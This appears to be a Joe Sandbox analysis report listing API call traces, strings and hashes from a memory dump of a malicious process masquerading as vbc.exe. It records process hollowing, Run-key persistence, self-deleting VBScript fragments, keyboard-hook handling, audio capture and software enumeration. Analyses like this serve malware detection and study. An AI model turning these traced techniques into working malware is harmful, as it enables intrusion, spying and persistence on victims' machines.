                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                    • String ID: DISPLAY
                    • API String ID: 479521175-865373369
                    • Opcode ID: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
                    • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                    • Opcode Fuzzy Hash: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
                    • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                    APIs
                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                    • GetProcAddress.KERNEL32(00000000), ref: 00418139
                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                    • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                    • GetProcAddress.KERNEL32(00000000), ref: 00418161
                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                    • GetProcAddress.KERNEL32(00000000), ref: 00418175
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                    • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                    • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                    • ResumeThread.KERNEL32(?), ref: 00418435
                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                    • GetCurrentProcess.KERNEL32(?), ref: 00418457
                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                    • GetLastError.KERNEL32 ref: 0041847A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                    • API String ID: 4188446516-3035715614
                    • Opcode ID: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                    • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                    • Opcode Fuzzy Hash: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                    • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                    APIs
                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                      • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                      • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                    • ExitProcess.KERNEL32 ref: 0040D7D0
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                    • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                    • API String ID: 1861856835-332907002
                    • Opcode ID: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                    • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                    • Opcode Fuzzy Hash: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                    • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                    APIs
                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                      • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                    • ExitProcess.KERNEL32 ref: 0040D419
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                    • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                    • API String ID: 3797177996-2557013105
                    • Opcode ID: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                    • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                    • Opcode Fuzzy Hash: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                    • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                    APIs
                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                    • ExitProcess.KERNEL32(00000000), ref: 004124A0
                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                    • CloseHandle.KERNEL32(00000000), ref: 0041253B
                    • GetCurrentProcessId.KERNEL32 ref: 00412541
                    • PathFileExistsW.SHLWAPI(?), ref: 00412572
                    • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                    • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                    • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                      • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                    • Sleep.KERNEL32(000001F4), ref: 00412682
                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                    • CloseHandle.KERNEL32(00000000), ref: 004126A9
                    • GetCurrentProcessId.KERNEL32 ref: 004126AF
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                    • String ID: .exe$8SG$WDH$exepath$open$temp_
                    • API String ID: 2649220323-436679193
                    • Opcode ID: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                    • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                    • Opcode Fuzzy Hash: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                    • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                    APIs
                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                    • SetEvent.KERNEL32 ref: 0041B219
                    • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                    • CloseHandle.KERNEL32 ref: 0041B23A
                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                    • API String ID: 738084811-2094122233
                    • Opcode ID: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                    • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                    • Opcode Fuzzy Hash: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                    • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                    APIs
                    • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                    • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                    • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                    • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                    • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                    • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                    • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                    • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                    • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Write$Create
                    • String ID: RIFF$WAVE$data$fmt
                    • API String ID: 1602526932-4212202414
                    • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                    • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                    • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                    • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                    APIs
                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                    • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                    • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                    • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                    • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                    • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                    • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                    • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                    • API String ID: 1646373207-3995267147
                    • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                    • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                    • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                    • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                    APIs
                    • _wcslen.LIBCMT ref: 0040CE07
                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                    • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                    • _wcslen.LIBCMT ref: 0040CEE6
                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                    • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe,00000000,00000000), ref: 0040CF84
                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                    • _wcslen.LIBCMT ref: 0040CFC6
                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                    • ExitProcess.KERNEL32 ref: 0040D062
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                    • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe$del$open
                    • API String ID: 1579085052-2133383635
                    • Opcode ID: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
                    • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                    • Opcode Fuzzy Hash: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
                    • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                    APIs
                    • lstrlenW.KERNEL32(?), ref: 0041C036
                    • _memcmp.LIBVCRUNTIME ref: 0041C04E
                    • lstrlenW.KERNEL32(?), ref: 0041C067
                    • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                    • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                    • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                    • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                    • _wcslen.LIBCMT ref: 0041C13B
                    • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                    • GetLastError.KERNEL32 ref: 0041C173
                    • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                    • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                    • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                    • GetLastError.KERNEL32 ref: 0041C1D0
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                    • String ID: ?
                    • API String ID: 3941738427-1684325040
                    • Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                    • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                    • Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                    • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                    APIs
                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                    • LoadLibraryA.KERNEL32(?), ref: 00414E17
                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                    • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                    • LoadLibraryA.KERNEL32(?), ref: 00414E76
                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                    • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                    • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Library$AddressFreeProc$Load$DirectorySystem
                    • String ID: IA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                    • API String ID: 2490988753-1941338355
                    • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                    • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                    • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                    • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                    APIs
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$EnvironmentVariable$_wcschr
                    • String ID:
                    • API String ID: 3899193279-0
                    • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                    • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                    • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                    • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                      • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                      • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                    • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                    • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                    • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                    • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                    • Sleep.KERNEL32(00000064), ref: 00412E94
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                    • String ID: /stext "$0TG$0TG$NG$NG
                    • API String ID: 1223786279-2576077980
                    • Opcode ID: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                    • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                    • Opcode Fuzzy Hash: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                    • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                    • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEnumOpen
                    • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                    • API String ID: 1332880857-3714951968
                    • Opcode ID: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
                    • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                    • Opcode Fuzzy Hash: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
                    • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                    APIs
                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                    • GetCursorPos.USER32(?), ref: 0041D5E9
                    • SetForegroundWindow.USER32(?), ref: 0041D5F2
                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                    • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                    • ExitProcess.KERNEL32 ref: 0041D665
                    • CreatePopupMenu.USER32 ref: 0041D66B
                    • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                    • String ID: Close
                    • API String ID: 1657328048-3535843008
                    • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                    • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                    • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                    • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                    APIs
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$Info
                    • String ID:
                    • API String ID: 2509303402-0
                    • Opcode ID: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
                    • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                    • Opcode Fuzzy Hash: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
